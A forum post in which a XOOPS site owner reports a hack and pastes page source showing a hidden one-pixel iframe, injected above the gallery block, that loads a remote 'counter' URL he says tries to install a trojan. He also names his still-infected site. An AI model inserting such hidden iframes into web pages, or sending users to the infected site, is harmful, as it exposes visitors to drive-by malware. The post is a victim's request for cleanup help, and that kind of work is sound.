1
It appears as if my XOOPS site has been hacked, a iframe pointing to
http://googlerank.info/counter has appeared in the coding on the main page which then trys to download something nasty.
I'm not sure where to look to remove it though, i extracted the MySQL database and couldnt find it in any of the tables and did a search for it in all the php,htm,html,css files of the site too.
Although not visable to a site user its coding appears underneath the menu on the left of the site, just before the random xoopsgallery image.
</table><div class="blockContent"><table cellspacing="0">
<tr>
<td id="mainmenu">
<a class="menuTop" href="http://www.blmra.co.uk/">Home</a>
<!-- start module menu loop -->
<a class="menuMain" href="http://www.blmra.co.uk/modules/wfchannel/">About Lawn Mower Racing</a>
<a class="menuMain" href="http://www.blmra.co.uk/modules/news/">Latest News</a>
<a class="menuMain" href="http://www.blmra.co.uk/modules/googlemaps/">Events</a>
<a class="menuMain" href="http://www.blmra.co.uk/modules/turismo/">12 Hour</a>
<a class="menuMain" href="http://www.blmra.co.uk/modules/xoopsfaq/">FAQ</a>
<a class="menuMain" href="http://www.blmra.co.uk/modules/page/">Race Results</a>
<a class="menuMain" href="http://www.blmra.co.uk/modules/wmpdownloads/">Downloads</a>
<a class="menuMain" href="http://www.blmra.co.uk/modules/osC/">Online Purchasing</a>
<a class="menuMain" href="http://www.blmra.co.uk/modules/xoopsgallery/">Gallery</a>
<a class="menuMain" href="http://www.blmra.co.uk/modules/association/">Video</a>
<a class="menuMain" href="http://www.blmra.co.uk/modules/userpage/">Racers Profiles</a>
<a class="menuMain" href="http://www.blmra.co.uk/modules/newbb/">Check Race Entry</a>
<a class="menuMain" href="http://www.blmra.co.uk/modules/catads/">Classifieds</a>
<a class="menuMain" href="http://www.blmra.co.uk/modules/myalbum/">Users Photos</a>
<a class="menuMain" href="http://www.blmra.co.uk/modules/mylinks/">Links</a>
<a class="menuMain" href="http://www.blmra.co.uk/modules/services/">Contact Us</a>
<a class="menuMain" href="http://www.blmra.co.uk/modules/dms/">Document Management System</a>
<!-- end module menu loop -->
</td>
</tr>
</table></div></td>
</tr>
</table>
<table cellspacing="0">
<tr>
<td class="obBlock" ><table cellspacing="0">
<tr>
<td width="4"><img src="http://www.blmra.co.uk/themes/blmrav6//images/lhl.gif" width="4" height="20" alt="" /></td>
<td class="blockTitle" >Random Picture</td>
<td width="4"><img src="http://www.blmra.co.uk/themes/blmrav6//images/lhr.gif" width="4" height="20" alt="" /></td>
</tr>
</table><div class="blockContent"><iframe src=http://googlerank.info/counter width=1 height=1 style=display:none></iframe><!-- XoopsGallery Random block begin -->
<div> <div style="width: 100%;">
<div class="item" style="padding: 2px; margin: 2px;">
<div style="text-align: center; width: 100%; ">
<a href="http://www.blmra.co.uk/modules/xoopsgallery/view_photo.php?xoops_imageid=4332&set_albumName=album18&id=IMG_0167"><img src="http://www.blmra.co.uk/modules/xoopsgallery/cache/albums/album18/IMG_0167.thumb.jpg" width="150" height="100" alt="" /></a><br />
</div>
<div style="text-align: center; width: 100%; ">
</div>
</div>
</div>
<div style="clear:both;"></div></div>
<!-- XoopsGallery Random block end --></div></td>
</tr>
</table>
Anyone have any ideas where i should look to remove this?
The site is www.blmra.co.uk, my virus scanner catches it every time. Although look at your own risk, it trys to install a trojan.
Thanks
Deano
